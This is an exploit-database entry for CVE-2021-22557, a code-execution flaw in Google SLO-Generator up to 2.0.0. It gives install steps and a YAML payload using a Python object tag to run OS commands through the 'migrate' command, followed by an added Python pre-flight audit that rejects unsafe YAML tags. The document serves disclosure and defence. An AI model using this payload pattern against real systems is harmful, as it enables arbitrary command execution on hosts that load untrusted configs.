# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557

##############################################################################

*Introduction*:

SLO-Generator is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format.

##############################################################################

*POC:*

1. pip3 install slo-generator==2.0.0

2. Save the below yaml code in a file as exploit.yaml.

    !!python/object/apply:os.system ["id;whoami"]

3. Run the below command:

    slo-generator migrate -b exploit.yaml

##############################################################################
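
*Defensive check (added example):*

The POC depends on a YAML tag that PyYAML's non-safe loaders resolve to a Python callable. The sketch below is an added example, not code from the exploit author or the slo-generator project: a standard-library pre-flight audit that rejects any config carrying a tag outside a small allowlist, meant as a gate for configs from untrusted sources alongside upgrading beyond the affected versions. The names `audit_yaml_text`, `SAFE_TAGS`, `PAGE_PAYLOAD` and `BENIGN_CONFIG` are hypothetical, and the benign sample is constructed.

```python
import re

# Standard YAML tags that only yield plain data; everything else is rejected.
SAFE_TAGS = {"!!" + name for name in (
    "str", "int", "float", "bool", "null", "map", "seq",
    "binary", "timestamp", "set", "omap", "pairs")}

# A tag token: "!" at the start of a node (start of line, or after whitespace
# or a flow/collection indicator), in verbatim "!<...>" or shorthand form.
TAG_TOKEN = re.compile(r"(?:^|(?<=[\s\[\]{},:?-]))!(?:<[^>\s]*>|[^\s\[\]{},]*)")
# %TAG directives can rename tag handles, so a config declaring one is rejected.
TAG_DIRECTIVE = re.compile(r"^%TAG\b")

# Constructed samples: the exploit.yaml content from the POC, and a benign
# config whose key names are illustrative only.
PAGE_PAYLOAD = '!!python/object/apply:os.system ["id;whoami"]\n'
BENIGN_CONFIG = 'service_name: demo\ngoal: !!float "0.99"\nnote: all good!\n'


def audit_yaml_text(text):
    """Return (line_number, token, reason) findings; an empty list means clean.

    Fail-closed by design: a "!" token inside quotes or a comment is reported
    too, because separating those reliably needs a full YAML parser.
    """
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if TAG_DIRECTIVE.match(line):
            findings.append((number, line.strip(), "tag directive"))
            continue
        for match in TAG_TOKEN.finditer(line):
            token = match.group(0)
            if token in SAFE_TAGS:
                continue
            reason = ("python-specific tag" if "python" in token.lower()
                      else "non-allowlisted tag")
            findings.append((number, token, reason))
    return findings


if __name__ == "__main__":
    for label, sample in (("poc", PAGE_PAYLOAD), ("benign", BENIGN_CONFIG)):
        print(label, audit_yaml_text(sample) or "clean")
```

Because the audit allowlists tags instead of searching for the word "python", a config that declares its own tag handle is rejected as well.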